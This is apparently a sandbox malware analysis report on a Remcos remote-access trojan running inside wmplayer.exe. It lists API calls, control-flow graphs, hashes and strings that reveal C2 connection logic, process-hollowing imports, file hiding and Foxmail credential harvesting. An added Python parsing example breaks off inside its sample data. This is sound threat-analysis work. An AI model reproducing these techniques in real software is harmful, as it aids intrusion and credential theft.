                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ErrorLast$Heap$AllocInfoNativeProcessSystem
                                                                                            • String ID:
                                                                                            • API String ID: 3525466593-0
                                                                                            • Opcode ID: 79ee37443a4366c3bbea1b893000b12d050509257f9cb6c9a6ccb14135485088
                                                                                            • Instruction ID: 414678d8c61d87a8872ee73c425a8c4ab38aff0ef96490e16bc3f9b9534d1ba0
                                                                                            • Opcode Fuzzy Hash: 79ee37443a4366c3bbea1b893000b12d050509257f9cb6c9a6ccb14135485088
                                                                                            • Instruction Fuzzy Hash: 1861C270200301ABD720DF66C981BA77BE6BF44744F04412AF9058B786EBF8E8C5CB99
                                                                                            APIs
                                                                                            • GetLocalTime.KERNEL32(00000001,00473EE8,004745A8,00000000,?,?,?,?,?,00414D8A,?,00000001), ref: 00404946
                                                                                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00473EE8,004745A8,00000000,?,?,?,?,?,00414D8A,?,00000001), ref: 00404994
                                                                                            • CreateThread.KERNEL32(00000000,00000000,00404B1D,?,00000000,00000000), ref: 004049A7
                                                                                            Strings
                                                                                            • KeepAlive | Enabled | Timeout: , xrefs: 0040495C
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Create$EventLocalThreadTime
                                                                                            • String ID: KeepAlive | Enabled | Timeout:
                                                                                            • API String ID: 2532271599-1507639952
                                                                                            • Opcode ID: 15ad2142c8d53324ba778f00eb03576116a55d57072510ab0b369c8eb1ce1fae
                                                                                            • Instruction ID: c7daaf492e0cec12b0841424890a61be8e5b61f5a3177df3d8f4b9063cedc03f
                                                                                            • Opcode Fuzzy Hash: 15ad2142c8d53324ba778f00eb03576116a55d57072510ab0b369c8eb1ce1fae
                                                                                            • Instruction Fuzzy Hash: 38113AB19042547AC710A7BA8C49BCB7F9C9F86364F00407BF40462192C7789845CBFA
                                                                                            APIs
                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF,?,?,0040460E,00000000,?,?), ref: 0040456A
                                                                                            • SetEvent.KERNEL32(?,?,?,0040460E,00000000,?,?), ref: 00404588
                                                                                            • recv.WS2_32(?,?,?,00000000), ref: 0040459F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: EventObjectSingleWaitrecv
                                                                                            • String ID:
                                                                                            • API String ID: 311754179-0
                                                                                            • Opcode ID: f607482e4343822148b028568a10a35340e8017a1e546fdda455ad4df8589c88
                                                                                            • Instruction ID: 26c9fa113e50de76ad78d978a7fe27ea9b76c3f20528cd6e12f8aa4c3c3b2b63
                                                                                            • Opcode Fuzzy Hash: f607482e4343822148b028568a10a35340e8017a1e546fdda455ad4df8589c88
                                                                                            • Instruction Fuzzy Hash: 3FF08236108212BFD7018B14FC08E1AFBA2FB88721F10863AF614522A19771EC20DB59
                                                                                            APIs
                                                                                            • GetComputerNameExW.KERNEL32(00000001,?,0000002B,00474358), ref: 0041A7BF
                                                                                            • GetUserNameW.ADVAPI32(?,0040DFC3), ref: 0041A7D7
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Name$ComputerUser
                                                                                            • String ID:
                                                                                            • API String ID: 4229901323-0
                                                                                            • Opcode ID: d080141cef9e3990b2f6bec53120ee530cdf67b1126702e4f13589ad74e7334c
                                                                                            • Instruction ID: 0a408ea7b536296bc4698588bf682dce528bd2697060893402f21fe22c13e40a
                                                                                            • Opcode Fuzzy Hash: d080141cef9e3990b2f6bec53120ee530cdf67b1126702e4f13589ad74e7334c
                                                                                            • Instruction Fuzzy Hash: 8801FF7290011CAADB14EB90DC45ADDBBBCEF44715F10017AB501B21D5EFB4AB898A98
                                                                                            APIs
                                                                                            • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,004145AD,00473EE8,00474A10,00473EE8,00000000,00473EE8,?,00473EE8,5.3.0 Pro), ref: 0040E68D
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: InfoLocale
                                                                                            • String ID:
                                                                                            • API String ID: 2299586839-0
                                                                                            • Opcode ID: cfd0bc145c26702e1739b42b90775f026f17fa5d8f36fb20b32d05d25c771de3
                                                                                            • Instruction ID: fdf89a5244b67fc368892e36cd71d3b7bc7b33248e42f87f25a9228cb5794c84
                                                                                            • Opcode Fuzzy Hash: cfd0bc145c26702e1739b42b90775f026f17fa5d8f36fb20b32d05d25c771de3
                                                                                            • Instruction Fuzzy Hash: E6D05E607002197BEA109291DC0AE9B7A9CE700B66F000165BA01E72C0E9A0AF008AE1

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                              • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BCF8
                                                                                              • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD01
                                                                                              • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BD18
                                                                                              • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD1B
                                                                                              • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD2D
                                                                                              • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD30
                                                                                              • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD41
                                                                                              • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD44
                                                                                              • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040D783), ref: 0041BD55
                                                                                              • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD58
                                                                                              • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040D783), ref: 0041BD65
                                                                                              • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD68
                                                                                              • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D783), ref: 0041BD75
                                                                                              • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD78
                                                                                              • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D783), ref: 0041BD85
                                                                                              • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD88
                                                                                              • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D783), ref: 0041BD99
                                                                                              • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD9C
                                                                                              • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D783), ref: 0041BDA9
                                                                                              • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDAC
                                                                                              • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D783), ref: 0041BDBD
                                                                                              • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDC0
                                                                                              • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D783), ref: 0041BDD1
                                                                                              • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDD4
                                                                                              • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040D783), ref: 0041BDE5
                                                                                              • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDE8
                                                                                              • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040D783), ref: 0041BDF5
                                                                                              • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDF8
                                                                                              • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040D783), ref: 0041BE06
                                                                                            • GetModuleFileNameW.KERNEL32(00000000,C:\Program Files (x86)\Windows Media Player\wmplayer.exe,00000104), ref: 0040D790
                                                                                              • Part of subcall function 0040FCBA: __EH_prolog.LIBCMT ref: 0040FCBF
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                             • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
                                                                                            • String ID: 0DG$@CG$@CG$Access Level: $Administrator$C:\Program Files (x86)\Windows Media Player\wmplayer.exe$Exe$Exe$Inj$Remcos Agent initialized$Rmc-MKYDDH$Software\$User$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$`=G$dCG$del$del$exepath$licence$license_code.txt$BG$BG$BG$BG$BG
                                                                                            • API String ID: 2830904901-420791318
                                                                                            • Opcode ID: 5d7b8b9e03e273b64e8f372163362180627e7252eeeaa846a87e68f68c2bfc81
                                                                                            • Instruction ID: 4071723a11783d2da8da933f82134b9c6f3815e49c8d87d463163304bf45e319
                                                                                            • Opcode Fuzzy Hash: 5d7b8b9e03e273b64e8f372163362180627e7252eeeaa846a87e68f68c2bfc81
                                                                                            • Instruction Fuzzy Hash: 4032A360B043406ADA18B776DC57BBE269A8FC1748F04443FB8467B2E2DE7C9D45839E

                                                                                            Control-flow Graph

                                                                                            control_flow_graph 494 413fd4-41401f call 401faa call 41aa73 call 401faa call 401d64 call 401e8f call 43a5e7 507 414021-414028 Sleep 494->507 508 41402e-41407c call 401f66 call 401d64 call 401fbd call 41afc3 call 404262 call 401d64 call 40b125 494->508 507->508 523 4140f0-41418a call 401f66 call 401d64 call 401fbd call 41afc3 call 401d64 * 2 call 4085b4 call 4027cb call 401eef call 401eea * 2 call 401d64 call 405422 508->523 524 41407e-4140ed call 401d64 call 4022f8 call 401d64 call 401e8f call 401d64 call 4022f8 call 401d64 call 401e8f call 401d64 call 4022f8 call 401d64 call 401e8f call 404101 508->524 577 41419a-4141a1 523->577 578 41418c-414198 523->578 524->523 579 4141a6-414242 call 40541d call 404cbf call 405ce6 call 4027cb call 401f66 call 41a686 call 401eea * 2 call 401d64 call 401e8f call 401d64 call 401e8f call 413f9a 577->579 578->579 606 414244-41428a WSAGetLastError call 41bc76 call 404c9e call 401f66 call 41a686 call 401eea 579->606 607 41428f-41429d call 4041f1 579->607 629 414b54-414b66 call 4047eb call 4020b4 606->629 612 4142ca-4142df call 404915 call 40428c 607->612 613 41429f-4142c5 call 401f66 * 2 call 41a686 607->613 628 4142e5-414432 call 401d64 * 2 call 404cbf call 405ce6 call 4027cb call 405ce6 call 4027cb call 401f66 call 41a686 call 401eea * 4 call 41a96d call 413683 call 4082dc call 440c51 call 401d64 call 401fbd call 4022f8 call 401e8f * 2 call 41265d 612->628 612->629 613->629 694 414434-414441 call 40541d 628->694 695 414446-41446d call 401e8f call 412513 628->695 643 414b68-414b88 call 401d64 call 401e8f call 43a5e7 Sleep 629->643 644 414b8e-414b96 call 401d8c 629->644 643->644 644->523 694->695 701 414474-414abb call 403b40 call 40cbf1 call 41adee call 41aec8 call 41ad46 call 401d64 GetTickCount call 41ad46 call 41aca0 call 41ad46 * 2 call 41ac52 call 41aec8 * 5 call 40e679 call 41aec8 call 4027ec call 40275c call 4027cb call 40275c call 
4027cb * 3 call 40275c call 4027cb call 405ce6 call 4027cb call 405ce6 call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 405ce6 call 4027cb * 5 call 40275c call 4027cb call 40275c call 4027cb * 7 call 40275c call 404468 call 401eea * 50 call 401e13 call 401eea * 6 call 401e13 call 4045d5 695->701 702 41446f-414471 695->702 947 414ac0-414ac7 701->947 702->701 948 414ac9-414ad0 947->948 949 414adb-414ae2 947->949 948->949 950 414ad2-414ad4 948->950 951 414ae4-414ae9 call 40a767 949->951 952 414aee-414b20 call 405415 call 401f66 * 2 call 41a686 949->952 950->949 951->952 963 414b22-414b2e CreateThread 952->963 964 414b34-414b4f call 401eea * 2 call 401e13 952->964 963->964 964->629
                                                                                            APIs
                                                                                            • Sleep.KERNEL32(00000000,00000029,004742F8,?,00000000), ref: 00414028
                                                                                            • WSAGetLastError.WS2_32 ref: 00414249
                                                                                            • Sleep.KERNEL32(00000000,00000002), ref: 00414B88
                                                                                              • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                             • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Sleep$ErrorLastLocalTime
                                                                                            • String ID: | $%I64u$5.3.0 Pro$@CG$C:\Program Files (x86)\Windows Media Player\wmplayer.exe$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$Exe$Rmc-MKYDDH$TLS Off$TLS On $XCG$XCG$XCG$`=G$dCG$hlight$name$>G$>G$BG
                                                                                            • API String ID: 524882891-4208741794
                                                                                            • Opcode ID: 4d9d63c375b04e0ab183b302961c5789bacc940e7ede69b30a37692d4a1764dd
                                                                                            • Instruction ID: a0bb0b13232d9f5991351636829aab2dda2428bc81dc0b9639db3628de0ead2f
                                                                                            • Opcode Fuzzy Hash: 4d9d63c375b04e0ab183b302961c5789bacc940e7ede69b30a37692d4a1764dd
                                                                                            • Instruction Fuzzy Hash: 58524E31A001145ADB18F771DDA6AEE73A59F90708F1041BFB80A771E2EF385E85CA9D

                                                                                            Control-flow Graph

                                                                                            control_flow_graph 971 411c81-411cca GetModuleFileNameW call 401faa * 3 978 411ccc-411d56 call 41ab38 call 401e8f call 40c854 call 401eea call 41ab38 call 401e8f call 40c854 call 401eea call 41ab38 call 401e8f call 40c854 call 401eea 971->978 1003 411d58-411de8 call 401e8f call 403b40 call 403cbb call 403cdc call 4028cf call 401e07 call 4176b6 call 401e13 * 4 978->1003 1026 411df8 1003->1026 1027 411dea-411df2 Sleep 1003->1027 1028 411dfa-411e8a call 401e8f call 403b40 call 403cbb call 403cdc call 4028cf call 401e07 call 4176b6 call 401e13 * 4 1026->1028 1027->1003 1027->1026 1051 411e9a 1028->1051 1052 411e8c-411e94 Sleep 1028->1052 1053 411e9c-411f2c call 401e8f call 403b40 call 403cbb call 403cdc call 4028cf call 401e07 call 4176b6 call 401e13 * 4 1051->1053 1052->1028 1052->1051 1076 411f3c-411f60 1053->1076 1077 411f2e-411f36 Sleep 1053->1077 1078 411f64-411f80 call 401e07 call 41b61a 1076->1078 1077->1053 1077->1076 1083 411f82-411f91 call 401e07 DeleteFileW 1078->1083 1084 411f97-411fb3 call 401e07 call 41b61a 1078->1084 1083->1084 1091 411fd0 1084->1091 1092 411fb5-411fce call 401e07 DeleteFileW 1084->1092 1094 411fd4-411ff0 call 401e07 call 41b61a 1091->1094 1092->1094 1100 411ff2-412004 call 401e07 DeleteFileW 1094->1100 1101 41200a-41200c 1094->1101 1100->1101 1103 412019-412024 Sleep 1101->1103 1104 41200e-412010 1101->1104 1103->1078 1107 41202a-41203c call 408339 1103->1107 1104->1103 1106 412012-412017 1104->1106 1106->1103 1106->1107 1110 412092-4120b1 call 401e13 * 3 1107->1110 1111 41203e-41204c call 408339 1107->1111 1123 4120b6-41211f call 40b027 call 401e07 call 401fbd call 4123f7 call 401e13 call 405422 1110->1123 1111->1110 1117 41204e-41205c call 408339 1111->1117 1117->1110 1122 41205e-41208a Sleep call 401e13 * 3 1117->1122 1122->978 1137 412090 1122->1137 1143 412125-41226f call 41aec8 call 41ad46 call 4027ec call 4027cb * 6 call 40275c call 4027cb 
call 40275c call 404468 call 401eea * 10 1123->1143 1144 412274-41231b call 41aec8 call 4027ec call 4027cb * 6 call 40275c call 404468 1123->1144 1137->1123 1213 41236f-4123e7 call 401eea call 401e13 call 401eea * 9 1143->1213 1184 412320-41236b call 401eea * 7 1144->1184 1184->1213 1247 4123ec-4123f6 1213->1247
                                                                                            APIs
                                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00411C9A
                                                                                              • Part of subcall function 0041AB38: GetCurrentProcessId.KERNEL32(00000000,75923530,00000000,?,?,?,?,00465900,0040C07B,.vbs,?,?,?,?,?,004742F8), ref: 0041AB5F
                                                                                              • Part of subcall function 004176B6: CloseHandle.KERNEL32(00403AB9,?,?,00403AB9,00465324), ref: 004176CC
                                                                                              • Part of subcall function 004176B6: CloseHandle.KERNEL32($SF,?,?,00403AB9,00465324), ref: 004176D5
                                                                                            • Sleep.KERNEL32(0000000A,00465324), ref: 00411DEC
                                                                                            • Sleep.KERNEL32(0000000A,00465324,00465324), ref: 00411E8E
                                                                                            • Sleep.KERNEL32(0000000A,00465324,00465324,00465324), ref: 00411F30
                                                                                            • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00411F91
                                                                                            • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00411FC8
                                                                                            • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00412004
                                                                                            • Sleep.KERNEL32(000001F4,00465324,00465324,00465324), ref: 0041201E
                                                                                            • Sleep.KERNEL32(00000064), ref: 00412060
                                                                                              • Part of subcall function 00404468: send.WS2_32(00000270,00000000,00000000,00000000), ref: 004044FD
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                             • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                                                                                            • String ID: /stext "$HDG$HDG$>G$>G
                                                                                            • API String ID: 1223786279-3931108886
                                                                                            • Opcode ID: fdcd57630078c49f8af3691b533906fc9683ec26e64b3a272ca4ebf66d4a0bb2
                                                                                            • Instruction ID: 1febf249a593eb43810efab42e14b6693ac358e03ba90545e56d33427da79e18
                                                                                            • Opcode Fuzzy Hash: fdcd57630078c49f8af3691b533906fc9683ec26e64b3a272ca4ebf66d4a0bb2
                                                                                            • Instruction Fuzzy Hash: 960243315083414AC325FB61D891AEFB7D5AFD4308F50493FF88A931E2EF785A49C69A

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 10001434
                                                                                              • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 10001137
                                                                                              • Part of subcall function 100010F1: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001151
                                                                                              • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000115C
                                                                                              • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000116D
                                                                                              • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000117C
                                                                                              • Part of subcall function 100010F1: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001193
                                                                                              • Part of subcall function 100010F1: FindNextFileW.KERNELBASE(00000000,00000010), ref: 100011D0
                                                                                              • Part of subcall function 100010F1: FindClose.KERNEL32(00000000), ref: 100011DB
                                                                                            • lstrlenW.KERNEL32(?), ref: 100014C5
                                                                                            • lstrlenW.KERNEL32(?), ref: 100014E0
                                                                                            • lstrlenW.KERNEL32(?,?), ref: 1000150F
                                                                                            • lstrcatW.KERNEL32(00000000), ref: 10001521
                                                                                            • lstrlenW.KERNEL32(?,?), ref: 10001547
                                                                                            • lstrcatW.KERNEL32(00000000), ref: 10001553
                                                                                            • lstrlenW.KERNEL32(?,?), ref: 10001579
                                                                                            • lstrcatW.KERNEL32(00000000), ref: 10001585
                                                                                            • lstrlenW.KERNEL32(?,?), ref: 100015AB
                                                                                            • lstrcatW.KERNEL32(00000000), ref: 100015B7
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4571892049.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                             • Associated: 00000006.00000002.4571861777.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                             • Associated: 00000006.00000002.4571892049.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_10000000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
                                                                                            • String ID: )$Foxmail$ProgramFiles
                                                                                            • API String ID: 672098462-2938083778
                                                                                            • Opcode ID: 70009fe3950369d2bec9de66e6564922956a7fdd4521fcb7cc54e78474496dcb
                                                                                            • Instruction ID: 44b728d421a24f1832cbc0053e0d9d9aefaca4d51113d01ad6b93c48f87fe4b0
                                                                                            • Opcode Fuzzy Hash: 70009fe3950369d2bec9de66e6564922956a7fdd4521fcb7cc54e78474496dcb
                                                                                            • Instruction Fuzzy Hash: 4081A475A40358A9EB30D7A0DC86FDE7379EF84740F00059AF608EB191EBB16AC5CB95

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • Sleep.KERNEL32(00001388), ref: 00409E62
                                                                                              • Part of subcall function 00409D97: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409E6F), ref: 00409DCD
                                                                                              • Part of subcall function 00409D97: GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409E6F), ref: 00409DDC
                                                                                              • Part of subcall function 00409D97: Sleep.KERNEL32(00002710,?,?,?,00409E6F), ref: 00409E09
                                                                                              • Part of subcall function 00409D97: CloseHandle.KERNEL32(00000000,?,?,?,00409E6F), ref: 00409E10
                                                                                            • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00409E9E
                                                                                            • GetFileAttributesW.KERNEL32(00000000), ref: 00409EAF
                                                                                            • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 00409EC6
                                                                                            • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 00409F40
                                                                                              • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633
                                                                                            • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00465900,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A049
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                             • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                                                                            • String ID: @CG$@CG$XCG$XCG$xAG$xAG
                                                                                            • API String ID: 3795512280-3163867910
                                                                                            • Opcode ID: 818c0fbae65db6fbdb4038cf918319d44e9dc5580a32f3981b56ddde7f909d0a
                                                                                            • Instruction ID: b7dfc09a395f5416f32c5fe597dbb364f69b6ed32616efff49b152d1c9b912f4
                                                                                            • Opcode Fuzzy Hash: 818c0fbae65db6fbdb4038cf918319d44e9dc5580a32f3981b56ddde7f909d0a
                                                                                            • Instruction Fuzzy Hash: 30518D716043005ACB05BB72D866ABF769AAFD1309F00053FF886B71E2DF3D9D44869A
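
The import-resolver listing for function 0041BCE3 earlier on this page (LoadLibraryA/GetModuleHandleA followed by GetProcAddress for names such as NtUnmapViewOfSection, IsUserAnAdmin and SetProcessDEPPolicy) and the install routine above (Sleep, CreateDirectoryW, SetFileAttributesW with 00000080 and then 00000006) are both presented as flat `Api.Module(stack values), ref: address` lines. The Python below is an added example by the editor, not Joe Sandbox or Remcos code: it parses lines in that format, lists the names the sample resolves at run time, and decodes the Sleep and SetFileAttributesW arguments (5000 ms; FILE_ATTRIBUTE_NORMAL; HIDDEN|SYSTEM). The sample input is copied from the listings on this page; the CAPABILITY labels are the editor's reading of why a RAT resolves those names dynamically, not something the report states, and treating an 8-digit hex value in the name slot as an ordinal is likewise an assumption.

```python
import re
from collections import namedtuple

# Constructed sample: lines copied from the API listings in this report
# (the 0041BCE3 import resolver and the install routine around 00409E62).
SAMPLE = """\
  • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BCF8
  • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD01
  • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040D783), ref: 0041BD55
  • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D783), ref: 0041BD99
  • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D783), ref: 0041BDA9
  • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040D783), ref: 0041BE06
• GetModuleFileNameW.KERNEL32(00000000,C:\\Program Files (x86)\\Windows Media Player\\wmplayer.exe,00000104), ref: 0040D790
• WSAGetLastError.WS2_32 ref: 00414249
• Sleep.KERNEL32(00001388), ref: 00409E62
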